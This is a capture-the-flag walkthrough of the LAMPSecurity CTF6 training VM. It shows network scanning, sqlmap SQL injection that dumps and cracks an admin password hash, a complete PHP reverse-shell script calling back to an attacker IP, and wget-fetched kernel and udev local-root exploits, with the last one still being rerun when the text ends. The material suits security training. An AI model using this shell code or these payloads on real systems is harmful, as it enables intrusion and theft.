Source Information

Author: madirish2600
Series: LAMPSecurity
Download: download.vulnhub.com/lampsecurity/ctf6.zip

“The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available here.”


Getting Started

As always, remember that it’s recommended to use walkthroughs as a “booster” to your own work when attempting to own vulnerable applications.
“For the things we have to learn before we can do them, we learn by doing them.” –Aristotle

Starting out, let’s use arp-scan to ARP out across our local network and identify that the CTF6 box has leased the IP address 10.0.88.8.

calvinbebop@Dolos:~$ arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.88.1	52:54:00:12:35:00	QEMU
10.0.88.3	08:00:27:d6:b4:6f	CADMUS COMPUTER SYSTEMS
10.0.88.8	08:00:27:f9:75:b0	CADMUS COMPUTER SYSTEMS

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.912 seconds (87.91 hosts/sec). 3 responded

Initial Service Enumeration

Now we’ll use Nmap to initiate a full TCP SYN scan of 10.0.88.8 and hopefully discover some potential attack vectors in the system. A complete description of the tool’s flag usage can be found here. As usual, we’ll start by utilizing the following flags:

Flag Description
-sS Utilize a TCP SYN scan
-sV Probe open ports to determine service/version info
-sC Run the default set of service scripts
-A Enable OS detection, version detection, script scanning, and traceroute
-p- Target all TCP ports from 1-65535
calvinbebop@Dolos:~$ sudo nmap -sS -sV -sC -A -p- 10.0.88.8
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-08 15:00 CST
Nmap scan report for 10.0.88.8
Host is up (0.00028s latency).
Not shown: 65525 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 14:a9:f4:11:dc:2c:4e:0d:45:6c:99:11:22:29:03:bc (DSA)
|_  2048 45:58:6c:98:3e:97:2a:da:e2:b8:6a:84:d4:6a:be:26 (RSA)
80/tcp   open  http     Apache httpd 2.2.3 ((CentOS))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: CTF 6 - Widgets Inc.
110/tcp  open  pop3     Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) UIDL TOP STLS RESP-CODES USER CAPA PIPELINING
| ssl-cert: Subject: commonName=imap.example.com
| Not valid before: 2009-06-23T23:53:41
|_Not valid after:  2010-06-23T23:53:41
|_ssl-date: 2018-12-08T21:00:32+00:00; 0s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
143/tcp  open  imap     Dovecot imapd
|_imap-capabilities: completed OK THREAD=REFERENCES Capability AUTH=PLAINA0001 UNSELECT NAMESPACE STARTTLS LITERAL+ CHILDREN MULTIAPPEND IMAP4rev1 LOGIN-REFERRALS IDLE SASL-IR SORT
| ssl-cert: Subject: commonName=imap.example.com
| Not valid before: 2009-06-23T23:53:41
|_Not valid after:  2010-06-23T23:53:41
|_ssl-date: 2018-12-08T21:00:32+00:00; 0s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
443/tcp  open  ssl/http Apache httpd 2.2.3 ((CentOS))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: CTF 6 - Widgets Inc.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-06-02T16:13:30
|_Not valid after:  2010-06-02T16:13:30
|_ssl-date: 2018-12-08T21:00:31+00:00; 0s from scanner time.
3306/tcp open  mysql    MySQL 5.0.45
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.45
|   Thread ID: 5
|   Capabilities flags: 41516
|   Some Capabilities: Support41Auth, SupportsTransactions, LongColumnFlag, Speaks41ProtocolNew, SupportsCompression, ConnectWithDatabase
|_  Status: Autocommit
MAC Address: 08:00:27:F9:75:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 10.0.88.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.88 seconds

HTTP (80/TCP) Enumeration (Scanning)

There’s quite a few open services available for us to target with CTF6. For this walkthrough we’ll go ahead and start off with a nikto scan of the web server in the background while we conduct a manual investigation of CTF6’s web application at 80/TCP or 443/TCP.

calvinbebop@Dolos:~$ nikto -h http://10.0.88.8
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.88.8
+ Target Hostname:    10.0.88.8
+ Target Port:        80
+ Start Time:         2018-12-08 15:14:03 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ Cookie roundcube_sessid created without the httponly flag
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 97164, size: 35791, mtime: Wed Oct 19 15:47:44 2095
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /sql/: Directory indexing found.LMAO
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8496 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:           2018-12-08 15:14:24 (GMT-6) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

HTTP (80/TCP) Manual Investigation

Welcome to CTF6’s homepage, Widgets Inc..

Jumping right into the source of home page, we’re able to identify names and user accounts for a number of the website’s staff members. This may come in handy if we need to attempt password bruteforcing later down the line.

Taking a look at one of the blog entries, we’re able to see that the web server is using the id parameter to specify which blog post to present. We can also note that this blog post was written by the admin account for this application.


SQL Injection Exploitation

Running through some basic SQL Injection tests, we’re able to verify a SQLi vulnerability exists by passing in MySQL’s SLEEP function. In this instance, the function causes the webserver to pause for 10 seconds before returning the blog post.

Passing this URL into sqlmap, we’re able to see that it finds three injection points via the id parameter!

calvinbebop@Dolos:~# sqlmap -u "http://10.0.88.8/index.php?id=4" -p "id"
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:07:52

[21:07:52] [INFO] testing connection to the target URL
[21:07:52] [INFO] testing if the target URL content is stable
[21:07:53] [INFO] target URL content is stable
[21:07:53] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[21:07:53] [INFO] testing for SQL injection on GET parameter 'id'
[21:07:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:07:53] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="non")
[21:07:53] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[21:07:58] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:07:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[21:07:58] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[21:07:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[21:07:58] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[21:07:58] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[21:07:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:07:58] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:07:58] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:07:58] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:07:58] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:07:58] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:07:58] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:07:58] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[21:07:59] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[21:07:59] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:07:59] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[21:07:59] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[21:07:59] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[21:07:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:07:59] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[21:07:59] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:07:59] [INFO] testing 'MySQL inline queries'
[21:07:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:07:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:07:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[21:07:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[21:07:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[21:07:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[21:07:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[21:08:09] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable 
[21:08:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:08:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:08:09] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:08:09] [INFO] target URL appears to have 7 columns in query
[21:08:09] [INFO] target URL appears to be UNION injectable with 7 columns
[21:08:09] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4 AND 5344=5344

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=4 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=4 UNION ALL SELECT NULL,NULL,CONCAT(0x7170626b71,0x6b5651616369484163717562684c6a4d5555544b4e6f596c58687373644e47516e7a734964696d4b,0x716a7a7871),NULL,NULL,NULL,NULL-- CVuw
---
[21:08:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[21:08:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.88.8'

[*] shutting down at 21:08:13

Using the previous injection points found by sqlmap, let’s take a look at what tables are available to us in this database

calvinbebop@Dolos:~# sqlmap -u "http://10.0.88.8/index.php?id=4" -p "id" --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:09:57

[21:09:57] [INFO] resuming back-end DBMS 'mysql' 
[21:09:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4 AND 5344=5344

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=4 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=4 UNION ALL SELECT NULL,NULL,CONCAT(0x7170626b71,0x6b5651616369484163717562684c6a4d5555544b4e6f596c58687373644e47516e7a734964696d4b,0x716a7a7871),NULL,NULL,NULL,NULL-- CVuw
---
[21:09:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[21:09:57] [INFO] fetching database names
[21:09:57] [INFO] fetching tables for databases: 'cms, information_schema, mysql, roundcube, test'
Database: cms
[3 tables]
+---------------------------------------+
| user                                  |
| event                                 |
| log                                   |
+---------------------------------------+

Database: roundcube
[6 tables]
+---------------------------------------+
| session                               |
| cache                                 |
| contacts                              |
| identities                            |
| messages                              |
| users                                 |
+---------------------------------------+

Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| PROFILING                             |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Database: mysql
[17 tables]
+---------------------------------------+
| user                                  |
| columns_priv                          |
| db                                    |
| func                                  |
| help_category                         |
| help_keyword                          |
| help_relation                         |
| help_topic                            |
| host                                  |
| proc                                  |
| procs_priv                            |
| tables_priv                           |
| time_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition                  |
| time_zone_transition_type             |
+---------------------------------------+

[21:09:57] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.88.8'

[*] shutting down at 21:09:57

The user table in the cms database looks interesting :)

calvinbebop@Dolos:~# sqlmap -u "http://10.0.88.8/index.php?id=4" -p "id" -D cms -T user
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:10:11

[21:10:11] [INFO] resuming back-end DBMS 'mysql' 
[21:10:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4 AND 5344=5344

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=4 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=4 UNION ALL SELECT NULL,NULL,CONCAT(0x7170626b71,0x6b5651616369484163717562684c6a4d5555544b4e6f596c58687373644e47516e7a734964696d4b,0x716a7a7871),NULL,NULL,NULL,NULL-- CVuw
---
[21:10:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[21:10:11] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.88.8'

[*] shutting down at 21:10:11

Sqlmap was able to extract the hashed password for the admin user account!

Database: cms
Table: user
[1 entry]
+---------+---------------+----------------------------------+
| user_id | user_username | user_password                    |
+---------+---------------+----------------------------------+
| 1       | admin         | 25e4ee4e9229397b6b17776bfceaf8e7 |
+---------+---------------+----------------------------------+

Hash Identification/Cracking

Using Hash-identifier (or an equivalent online tool), we’re able to determine that this is an MD5 hashed string.

calvinbebop@Dolos:~$ hash-identifier 
   #########################################################################
   #	 __  __ 		    		__		 	 ______    _____	       #
   #	/\ \/\ \		   		   /\ \ 		/\__  _\  /\  _ `\	       #
   #	\ \ \_\ \     __      ____ \ \ \___		\/_/\ \/  \ \ \/\ \	       #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R 							   #
   #							www.Blackploit.com 						   #
   #						       Root@Blackploit.com  				   #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 25e4ee4e9229397b6b17776bfceaf8e7

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Luckily for us, MD5 hashes are relatively easy to crack and numerous online sources are happy to provide the “decrypted” strings for provided hashes.

Hash Type Result
25e4ee4e9229397b6b17776bfceaf8e7 md5 adminpass

PHP Reverse Webshell Access (80/TCP)

Using our newfound password, we’re now able to gain access to the blog’s administrative panels.

One of the administrative pages appears to be form that allows us to create new blog entries. As to be expected, I motion that we attempt to post a PHP script that when retrieved will generate a reverse web shell back to our own machine.

The contents of ctf6-webshell.php are as follows. Sourced from xl7dev’s Github.

<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.0.88.5';  // Attacker IP Address
$port = 5454;       // Our listening port (netcat)
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>

Utilizing netcat to handle the incoming conntection, we now have reverse shell access into the target CTF6 machine.

calvinbebop@Dolos:~# nc -nvlp 5454
listening on [any] 5454 ...
connect to [10.0.88.5] from (UNKNOWN) [10.0.88.8] 53965
Linux localhost.localdomain 2.6.18-92.el5 #1 SMP Tue Jun 10 18:49:47 EDT 2008 i686 i686 i386 GNU/Linux
 13:45:31 up  1:19,  0 users,  load average: 0.01, 0.01, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-3.2$ 


Local Enumeration/Exploit Attempt #1

Getting our bearings, it appears we’ve assumed control of the apache user.

sh-3.2$ whoami
apache
sh-3.2$ id
uid=48(apache) gid=48(apache) groups=48(apache)

As is expected, our user doesn’t seem to have access to any other users’ home folders. BOO.

sh-3.2$ cd /home
sh-3.2$ ls -lsa
total 36
8 drwxr-xr-x  7 root  root  4096 Jun 24  2009 .
8 drwxr-xr-x 23 root  root  4096 Dec  9 12:26 ..
4 drwx------  2 fred  fred  4096 Jun 24  2009 fred
4 drwx------  3 john  john  4096 Jun 28  2009 john
4 drwx------  2 linda linda 4096 Jun 24  2009 linda
4 drwx------  2 molly molly 4096 Jun 24  2009 molly
4 drwx------  2 toby  toby  4096 Jun 24  2009 toby
sh-3.2$ 
sh-3.2$ cd fred
sh: cd: fred: Permission denied
sh-3.2$ cd john
sh: cd: john: Permission denied
sh-3.2$ cd linda
sh: cd: linda: Permission denied
sh-3.2$ cd molly
sh: cd: molly: Permission denied
sh-3.2$ cd toby
sh: cd: toby: Permission denied

Lucky for us, this specific kernel release looks to be vulnerable to a local privilege escalation exploit. The full exploit source can be found here.

sh-3.2$ uname -r
2.6.18-92.el5

Unfortunately, the local root exploit failed.

sh-3.2$ wget http://10.0.88.5/10613
--14:24:28--  http://10.0.88.5/10613
Connecting to 10.0.88.5:80... connected.
HTTP request sent, awaiting response... 404 Not Found
14:24:28 ERROR 404: Not Found.

sh-3.2$ wget http://10.0.88.5/10613.c
--14:24:42--  http://10.0.88.5/10613.c
Connecting to 10.0.88.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6663 (6.5K) [text/x-csrc]
Saving to: `10613.c'

     0K ......                                                100% 1.10G=0s

14:24:42 (1.10 GB/s) - `10613.c' saved [6663/6663]

sh-3.2$ gcc 10613.c -o 10613
sh-3.2$ chmod +x 10613
sh-3.2$ ./10613
-----------------------------------
 Linux 2.6.18-20 2009 Local Root Exploit
 By DigitALL
-----------------------------------
[-] mmap: Permission denied

Rooted - Exploit Attempt #2

Circling back, let’s try another exploit that this machine may be vulnerable to. More specifically, another local privilege escalation exploit affecting Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1.

sh-3.2$ wget http://10.0.88.5/8478.sh
--15:13:27--  http://10.0.88.5/8478.sh
Connecting to 10.0.88.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 223595 (218K)
Saving to: `8478.sh'

     0K .......... .......... .......... .......... .......... 22% 71.6M 0s
    50K .......... .......... .......... .......... .......... 45%  336M 0s
   100K .......... .......... .......... .......... .......... 68%  146M 0s
   150K .......... .......... .......... .......... .......... 91%  174M 0s
   200K .......... ........                                   100%  434M=0.001s

15:13:27 (144 MB/s) - `8478.sh' saved [223595/223595]
sh-3.2$ chmod +x 8478.sh
sh-3.2$ cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
f7fdce00 0   0      00000000 0        0        00000000 2
f6da2400 0   2444   00000111 0        0        00000000 2
f7dee000 6   0      00000000 0        0        00000000 2
f7d43800 7   0      00000000 0        0        00000000 2
f7f65000 9   0      00000000 0        0        00000000 2
f6e6da00 9   1765   00000000 0        0        00000000 2
f7f6de00 10  0      00000000 0        0        00000000 2
f7fa6e00 11  0      00000000 0        0        00000000 2
f7fdcc00 15  0      00000000 0        0        00000000 2
f7dfea00 15  380    ffffffff 0        0        00000000 2
f7fa6c00 16  0      00000000 0        0        00000000 2
c21b7a00 18  0      00000000 0        0        00000000 2

For some reason, this exploit required multiple passes to work.

sh-3.2$ ./8478.sh 380
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./8478.sh 380
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./8478.sh 380
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./8478.sh 379
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./8478.sh 379
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./8478.sh 379
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./8478.sh 379
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
